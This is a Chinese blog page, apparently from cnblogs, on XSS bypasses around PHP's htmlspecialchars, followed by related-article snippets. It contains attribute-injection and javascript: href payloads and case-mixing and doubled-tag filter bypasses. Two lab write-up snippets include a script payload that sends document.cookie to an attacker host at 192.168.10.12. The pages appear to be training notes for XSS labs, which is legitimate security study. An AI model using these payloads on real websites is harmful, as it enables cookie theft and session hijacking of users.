编码绕过xss说明和htmlspecialchars函数

时间：2024-03-04 21:34:59浏览次数：18

标签：xss 编码 alert 123 绕过 htmlspecialchars

html实体编码
JS编码
1.htmlspecialchars函数
把一些预定义的字符转换为html实体
预定义的字符

&->&amp;
"->&quot;
'->&#039;
<->&lt;
>->gt;
<script> --> <&ltscript&gt

默认绕过

绕过方式：
payload：' onclick='alert(123)'或者' onclick="alert(123)"

ENT_COMPAT

双引号被过滤

单引号可以绕过
2.xss之href过滤
payload：javascript：alert(123)

浏览器解析顺序：URL HTML CSS JS
3.xs之js绕过
'

https://www.w3school.com.cn/php/func_string_htmlspecialchars.asp

标签：xss,编码,alert,123,绕过,htmlspecialchars
From： https://www.cnblogs.com/laibunizi/p/18050617

XSS后台代码绕过
xss_01正则表达式替换绕过方式：大小写混合或纯大写绕过paylaod:<scripT>alert(AAA);</Script>或<SCRIPT>alert(123);<SCRIPT>字符最小化将获取的message数据中获取的大小写字符全部转换为小写绕过方式：通过双写绕过Payload：<sc<script>ript>alert</scrip<script>t>......
探索图片与Base64编码的优势与局限性
一、图片和Base64编码的关系：图片是一种常见的媒体文件格式，可以通过URL进行访问和加载。Base64编码是一种将二进制数据转换为ASCII字符的编码方式，可以将图片数据转换为字符串形式。图片Base64相互转换|一个覆盖广泛主题工具的高效在线平台(amd794.com)https://amd794.c......
所有中文汉字，中文汉字编码,typora功能汇总
#打印所有中文汉字：foriinrange(0x4e00,0x9fa6):print(chr(i),end='')#打印所有中文汉字编码：foriinrange(0x4e00,0x9fa6):print(i,end='')#打印中文对应的编码print(hex(ord('陈')))print(hex(ord('*')))print(hex(ord('*......
Python模块之urllib url编码
模块作用简介：Python模块之urlliburl编码官方英文帮助：https://docs.python.org/3/library/官方简体中文帮助：https://docs.python.org/zh-cn/3/library/必要操作：>>>importurllib安装：python3内置函数，无需安装如果像在py3里装py2的版本，需要指定版本号例......
通过正则表达式匹配PNR编码中的航班信息
PNR编辑内容主要由文本信息构，结果如下：一种方式是通过分隔符来提取信息，但效果是不理想的，因为格式会出现变化，推荐的方式是使用正则表达式，例如：1、通过正则获取航班号stringstrPattern=@"^[\s|\+|\-]?(?<Index>\d+)\.\s+\*?(?<FlightNo>\*?[A-Z0-9]{5,7})\s*(?<Level>[A-Z])\d......
Windows下CMD和Tomcat设置编码为UTF-8
由于日常编写代码，都是使用UTF-8编码，而CMD默认是GBK编码，导致执行mvn命令时，出现中文乱码问题，而chcp命令只在当次打开有效，每次打开都要重新切换代码页十分不便。对于CMD，可以通过修改注册表的方式，永久修改默认代码页。打开注册表编辑器，定位到\HKEY_CURRENT_USER\Console\%SystemRoot%......
反射型xss的post请求获取cookie
攻击者构造的网站地址：192.168.10.12:100受害者主机：192.168.10.134目标服务器：192.168.10.1步骤一：受害者主机访问目标服务器根据提示登录步骤二：输入xssPayload<script>document.location='http://192.168.10.12:100/pkxss/xcookie/cookie.php?cookie='+document.cookie<......
用delphi生成GBK 中文编码表(4~5) GBK/4~5: 0xAA40~0xFEA0(部分) 扩充汉字包括繁体
http://www.cnblogs.com/jfyes/archive/2009/09/24/1573638.html GBK中文编码：(*GBK是GB2312的扩展，是向上兼容的，因此GB2312中的汉字的编码与GBK中汉字的相同。 GBK中每个汉字仍然包含两个字节，第一个字节的范围是0x81-0xFE（即129-254），第二个字节的范围是0x40-0xFE（即64-254）......
xss利用之盗取cookie示例
实验环境目标网站：宿主机：192.168.10.1访问虚拟机win11：192.168.10.134伪造网站：192.168.10.12:100pikachu步骤一：受害者cookie：步骤二：输入xsspayload'"><script>document.location='http://192.168.10.12:100/pikachu/pkxss/xccokie/cookie.php?cookie='+doc......
Python | One-Hot Encoding (独热编码)
独热编码（One-HotEncoding），又称一位有效编码，其方法是使用N位状态寄存器来对N个状态进行编码，每个状态都有它独立的寄存器位，并且在任意时候，其中只有一位有效。即，只有一位是1，其余都是零值。独热编码是利用0和1表示一些参数，使用N位状态寄存器来对N个状态进行编码。地区特征：["北京"，"上......

编码绕过xss说明和htmlspecialchars函数

相关文章

赞助商

阅读排行